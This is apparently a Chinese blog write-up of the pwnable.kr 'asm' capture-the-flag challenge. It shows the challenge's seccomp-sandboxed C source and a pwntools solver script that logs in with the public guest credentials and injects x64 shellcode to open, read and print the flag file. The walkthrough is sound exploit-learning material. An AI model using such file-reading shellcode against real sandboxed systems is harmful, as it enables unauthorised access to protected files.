pwnable.kr asm
看样子是一道和shellcode有关的题目
连上去看看
目录下好像有个说明的文件查看一下
大概意思就是连接到9026端口 asm再特权下执行并get flag
那我们先看一下asm.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>#define LENGTH 128void sandbox(){scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);if (ctx == NULL) {printf("seccomp error\n");exit(0);}seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);if (seccomp_load(ctx) < 0){seccomp_release(ctx);printf("seccomp error\n");exit(0);}seccomp_release(ctx);
}char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];
int main(int argc, char* argv[]){setvbuf(stdout, 0, _IONBF, 0);setvbuf(stdin, 0, _IOLBF, 0);printf("Welcome to shellcoding practice challenge.\n");printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");printf("If this does not challenge you. you should play 'asg' challenge :)\n");char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);memset(sh, 0x90, 0x1000);memcpy(sh, stub, strlen(stub));int offset = sizeof(stub);printf("give me your x64 shellcode: ");read(0, sh+offset, 1000);alarm(10);chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmpsandbox();((void (*)(void))sh)();return 0;
}
这里我们来大概分析整段程序
1.读取我们的输入 建立一个可以执行的缓冲区,将stub拷入内存,并且提示
在此挑战中,您可以在SECCOMP沙箱下运行x64 shellcode
尝试制作仅使用open()/ read()/ write()系统调用输出标志的shellcode
setvbuf(stdout, 0, _IONBF, 0);setvbuf(stdin, 0, _IOLBF, 0);printf("Welcome to shellcoding practice challenge.\n");printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");printf("If this does not challenge you. you should play 'asg' challenge :)\n");char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);memset(sh, 0x90, 0x1000);memcpy(sh, stub, strlen(stub));
2.将我们输入读入stub之后,并开启沙箱环境,执行shellcode
int offset = sizeof(stub);printf("give me your x64 shellcode: ");read(0, sh+offset, 1000);alarm(10);chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmpsandbox();((void (*)(void))sh)();return 0;
我们来查看stub 中 的shellcode格式,运用pwntools查看
Python 2.7.17 (default, Oct 19 2019, 23:36:22)
[GCC 9.2.1 20191008] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> print disasm("\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff")0: 48 dec eax1: 31 c0 xor eax, eax3: 48 dec eax4: 31 db xor ebx, ebx6: 48 dec eax7: 31 c9 xor ecx, ecx9: 48 dec eaxa: 31 d2 xor edx, edxc: 48 dec eaxd: 31 f6 xor esi, esif: 48 dec eax10: 31 ff xor edi, edi12: 48 dec eax13: 31 ed xor ebp, ebp15: 4d dec ebp16: 31 c0 xor eax, eax18: 4d dec ebp19: 31 c9 xor ecx, ecx1b: 4d dec ebp1c: 31 d2 xor edx, edx1e: 4d dec ebp1f: 31 db xor ebx, ebx21: 4d dec ebp22: 31 e4 xor esp, esp24: 4d dec ebp25: 31 ed xor ebp, ebp27: 4d dec ebp28: 31 f6 xor esi, esi2a: 4d dec ebp2b: 31 ff xor edi, edi
分析一下这段shellcode 除了将寄存器清0并无其他特殊功能
既然知道了只能使用read,open,write,exit,exit_group 这些函数,这些函数其实只用来读取flag文件来说已经足够了。
那么shellcode部分我们就使用pwntools来编写
from pwn import *context(arch='amd64',os='linux',log_level='info')
con = ssh(host='pwnable.kr',user='asm',password='guest',port=2222)
r = con.connect_remote('localhost',9026)
shellcode = ''
#将字符串压入栈中
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
#字符串已在栈上,也就是rsp
shellcode += shellcraft.open('rsp')
#读取内容到rsp rax是open的返回值
shellcode += shellcraft.read('rax','rsp',100)
#linux下0--->stdin,1--->stdout,2--->stderr.write(1,'rsp',100)相当于将缓冲区中的内容输出
shellcode += shellcraft.write(1,'rsp',100)
#这里就类似监听以及发送
#http://docs.pwntools.com/en/stable/tubes.html
r.recvuntil('give me your x64 shellcode: ')
r.sendline(asm(shellcode))
#打印返回的数据
print r.recvall()
get flag
pwnable.kr asm相关推荐
- pwnable.kr 简单题目详细笔记汇总
文章目录 fd collision bof flag passcode random input leg mistake shellshock coin1 lotto cmd1 cmd2 uaf bl ...
- 【pwnable】asm之write up
首先查看源代码: #include <stdio.h> #include <string.h> #include <stdlib.h> #include <s ...
- 【pwnable.kr】day8:leg
pwnable:leg pwnable.kr:leg 题目链接 question Daddy told me I should study arm. But I prefer to study my ...
- 【pwnable.kr】leg
pwnable从入门到放弃第八题. Download : http://pwnable.kr/bin/leg.c Download : http://pwnable.kr/bin/leg.asm ss ...
- pwnable.kr wp leg
题目 Daddy told me I should study arm. But I prefer to study my leg!Download : http://pwnable.kr/bin/l ...
- pwnable.kr之Toddler‘s Bottle前八题知识点记录
pwn刷题网站地址(点击直达): http://pwnable.kr/play.php 文章目录 第一题 fd 第二题:collision 1.首先是char和int数据类型的转换 2.python实 ...
- pwnable.kr lotto题解
ssh lotto@pwnable.kr -p2222 (pw:guest) 题目源码: #include <stdio.h> #include <stdlib.h> #inc ...
- 简单易懂的 pwnable.kr 第六题[random]Writeupt
简单易懂的 pwnable.kr 第六题[random]Writeupt 题目地址: http://pwnable.kr/play.php 题目: peak小知识 异或^ 据有如下几种性质: 2. 恒 ...
- 简单易懂的 pwnable.kr 第三题[bof]Writeupt
简单易懂的 pwnable.kr 第三题[bof]Writeupt 题目地址:http://pwnable.kr/play.php 点开题目发现: 他给了提示覆盖,并且给了两个网址.分别打开,第一个给 ...
最新文章
- rocketmq还要eventbus_ListEventBuses_ListEventBuses_事件总线_C# SDK_阿里云SDK参考_事件总线EventBridge - 阿里云...
- MapReduce之单词计数
- 如何修改容器的一些参数
- 面试题分享【不断更新】
- 这是一篇Markdown手册
- Android Studio如何导出可供Unity使用的aar插件详解
- 数学家告诉你什么时候结束单身?!
- hashtable遍历
- 【论文研读】【金融】Predicting the direction of stock market prices using random forest
- innodb 索引 mysql_InnoDB索引实现
- java的ArrayList分析
- webpack-Hot Module Replacement(热更新)
- 手机前端框架UI库(Frozen UI、WeUI、SUI Mobile)
- Kindle刷安卓双系统的方法
- 搭建家庭 NAS 服务器有什么好方案?
- 鱼跃CMS-轻量开源企业CMS v1.4.6
- 俄勒冈州立大学研发脱口秀机器人,全美巡演数十场获好评
- window.open,打开窗口与打开新标签页,刷新父窗口数据
- css 设置背景图片模糊效果
- 云顶之奕pbe服务器注册,云顶之弈手游pbe服